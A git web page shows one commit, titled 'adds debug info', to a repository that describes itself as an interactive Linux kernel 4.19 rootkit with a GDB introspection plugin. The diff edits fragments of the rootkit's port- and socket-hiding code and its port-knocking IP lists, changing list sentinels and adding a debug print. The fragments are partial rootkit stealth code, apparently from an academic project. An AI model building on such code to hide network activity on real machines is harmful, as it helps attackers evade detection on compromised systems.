linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit
Log | Files | Refs
commit 10f7fd5244aeaf411d68797abe6c302af555e471
parent 9dc06ea6f7cfa204baa3bc6aa9c4b1fb0994642e
Author: deurzen <m.deurzen@tum.de>
Date:   Sun, 10 Jan 2021 21:22:28 +0100

adds debug info

Diffstat:

Msrc/porthide.c | 7+++++--


Msrc/sockhide.c | 4++--


2 files changed, 7 insertions(+), 4 deletions(-)

diff --git a/src/porthide.c b/src/porthide.c
@@ -45,7 +45,7 @@ knock_list_t ips_stage3 = {
 knock_list_t_ptr ips_stage3_tail = &ips_stage3;
 
 lport_list_t hidden_lports = {
-    .lport = -1,
+    .lport = 0,
     .prev = NULL,
     .next = NULL,
 };
@@ -145,7 +145,7 @@ remove_lport_from_list(lport_list_t_ptr list, lport_t lport)
 {
     lport_list_t_ptr i = find_lport_in_list(list, lport), ret = NULL;
 
-    if (i && (i->lport != -1)) {
+    if (i && (i->lport != 0)) {
         if (i->next)
             i->next->prev = i->prev;
         else
@@ -208,6 +208,9 @@ remove_knock_from_list(knock_list_t_ptr list, knock_list_t_ptr *tail, ip_t ip, i
     knock_list_t_ptr i = find_knock_in_list(list, ip, version), ret = NULL;
 
     if (i && (!memcmp(i->ip, ip, (version == v4 ? 4 : 16)) && i->version != -1)) {
+            int knock;
+            memcpy(&knock, ip, 4);
+            DEBUG_INFO("removing ip %0X from list\n", knock);
         if (i->next)
             i->next->prev = i->prev;
         else
diff --git a/src/sockhide.c b/src/sockhide.c
@@ -13,7 +13,7 @@
 #include "porthide.h"
 
 port_list_t hidden_ports = {
-    .port  = -1,
+    .port  = 0,
     .proto = -1,
     .prev = NULL,
     .next = NULL,
@@ -167,7 +167,7 @@ remove_port_from_list(port_list_t_ptr list, port_t port, proto_t proto)
 {
     port_list_t_ptr i = find_port_in_list(list, port, proto), ret = NULL;
 
-    if (i && (i->port != -1 && i->proto != -1)) {
+    if (i && (i->port != 0 && i->proto != -1)) {
         if (i->next)
             i->next->prev = i->prev;
         else